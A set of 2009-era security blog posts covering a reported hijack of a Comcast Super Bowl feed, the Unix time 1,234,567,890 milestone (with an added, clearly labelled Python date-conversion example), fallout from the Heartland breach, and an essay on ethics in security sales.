Someone [31337 h@x0rz?] apparently hacked the video feed (non-HD feed) of Comcast out in Tucson, AZ; and with 3 minutes left in the 4th quarter (after Fitzgerald had just run in for a TD) spliced in 30 seconds or so of a porn channel. Absolutely classic! This reminds me of the opening scene in Hackers... remember that movie?
"Our initial investigation suggests this was an isolated malicious act," Comcast spokeswoman Kelle Maslyn told the Star in an e-mail.
These types of hacks are old-school... but how much of it is made-up "hacker" stuff from Comcast to cover their own assets, and how much of it is real? Who knows.

Sunday, February 1, 2009

Unix Time Reaches Milestone on 2/13/2009

So Josh Abraham (jabra, of spl0it.org) IM'd me this morning to remind me (since I obviously wasn't paying any attention) that:

At precisely 11:31:30 pm UTC on February 13th, 2009, UNIX time will be 1,234,567,890

How cool is that?! Thanks Josh.
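To check that claim (and to see how an epoch value turns into a calendar date, which is exactly what you do when reading raw timestamps out of logs), here is an added Python example that is not part of the original post; the hand-rolled conversion uses Howard Hinnant's days-to-civil algorithm and is cross-checked against the standard library.

```python
"""Convert Unix time to a UTC calendar date by hand and verify the
1,234,567,890 milestone. Added example, not code from the original post."""
from datetime import datetime, timezone


def civil_from_days(z: int) -> tuple[int, int, int]:
    """Days since 1970-01-01 -> (year, month, day) in the proleptic
    Gregorian calendar. Algorithm by Howard Hinnant (public domain)."""
    z += 719468                                  # shift epoch to 0000-03-01
    era = z // 146097                            # 400-year cycles
    doe = z - era * 146097                       # day of era [0, 146096]
    yoe = (doe - doe // 1460 + doe // 36524 - doe // 146096) // 365
    y = yoe + era * 400
    doy = doe - (365 * yoe + yoe // 4 - yoe // 100)  # day of year, March-based
    mp = (5 * doy + 2) // 153                    # March-based month [0, 11]
    d = doy - (153 * mp + 2) // 5 + 1
    m = mp + 3 if mp < 10 else mp - 9            # back to Jan-based months
    return (y + (m <= 2), m, d)                  # Jan/Feb belong to next year


def unix_to_utc(ts: int) -> tuple[int, int, int, int, int, int]:
    """Epoch seconds -> (Y, M, D, h, m, s). Unix time ignores leap seconds,
    so every day is exactly 86400 seconds long."""
    days, secs = divmod(ts, 86400)
    y, m, d = civil_from_days(days)
    hh, rem = divmod(secs, 3600)
    mm, ss = divmod(rem, 60)
    return (y, m, d, hh, mm, ss)


def milestone_check(ts: int = 1234567890):
    """Return the hand-computed date and whether it matches the stdlib."""
    hand = unix_to_utc(ts)
    lib = datetime.fromtimestamp(ts, tz=timezone.utc)
    same = hand == (lib.year, lib.month, lib.day, lib.hour, lib.minute, lib.second)
    return hand, same


if __name__ == "__main__":
    print(milestone_check())   # ((2009, 2, 13, 23, 31, 30), True)
```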

Heartland Payment Systems - Data Breach Fallout

The fallout has officially begun... one of the largest MasterCard franchises in Canada, Canadian Tire, has re-issued 16,000 cards to its customers as a result of the breach. While this was, apparently, largely precautionary - the reality is now staring us in the face. This is costing companies serious dollars to re-issue cards, call customers or send some other notification, and monitor accounts...

I suspect that HPS will be eating the costs of their mis-adventure for years to come, assuming that they somehow manage to miraculously pull through this still in business.

Source: http://www.thestar.com/Business/article/579317

Sales vs. Reality

To my anonymous commenter on the post I pulled earlier... thanks for the reality check... it's been a rough week and perhaps I was a bit too... edgy.

Over the past 12 months, since joining the organization I currently work for, I've heard complaint after complaint about sales people. I know, I sympathize, I've typically trusted them half as far as I could throw them - and still do - so I wanted to write up a quick(er) version of why I think sales people, particularly in the security field, really need to check their ethics.

A few years ago when I was working for GE Power Systems, I had the misfortune of sitting through a meeting with a particularly bad sales guy. He had managed to convince our CISO that his company could really solve some of our problems, so it was up to my two colleagues and me to listen to his presentation and decide. From the start, things just didn't get off on the right foot.

When the guy walked into the conference room he informed us that he had the answer to everything that ailed us in security. I figured this was rather ambitious since he had no idea what our problems were, but he persisted. He asked us to give him our top-3 security challenges, which we did, then he proceeded to "solve" them for us using his product(s). Now, everyone's heard the phrase "When all you have is a hammer, everything looks like a nail," but this was taking it to a new extreme.

His in-line network appliance-based approach, together with a multi-server infrastructure and a client installed on every workstation and server, would solve all our problems. Let's assume for a moment that this proposal was even remotely feasible on a network as large as the one we were trying to secure - the costs would be outrageous, and given the complexity (and lack of hard-line management) this network suffered from, it was physically impossible to implement that solution. These blunt facts, of course, didn't really stop this guy. The fact is, he kept talking until we finally had to explain to him, in detail, why his product made zero sense in our environment.

Presentation and comprehension fail.

Here's my point... there are several tactics which sales folks often use that do a disservice to the products or solutions themselves... and clearly seek to "accidentally" ruin our credibility in a fragile market - but rather than call those out (as was pointed out to me earlier) perhaps it would be more constructive to throw out some pointers to any sales folks who read this blog...
  • Research the prospect - get to understand as much as you can about their environment, challenges, and current situation
  • Sell reality - Don't over-inflate, stretch, or bend the truth about the capabilities of whatever you're talking about
  • Your product is not the silver bullet - it doesn't matter what you're selling, it won't make your customer magically secure - learn it, accept it
  • There is no state of security - only states of higher-order risk mitigation
  • All the above applies even more when you're selling directly to a C-level
  • Products are useless without process - from firewalls, to antivirus, to scanner software... none of it is worth crap if there isn't a process around using it
  • People and tools are not mutually exclusive - you're going to need both to succeed, until tools learn to think
  • Product | Services aren't mutually exclusive either - see above
There you have it... and as a final thought - on the flip side of that, if you've got someone who's honestly trying to solve one of your problems... give them a chance; not all of the sales folks out there are bad.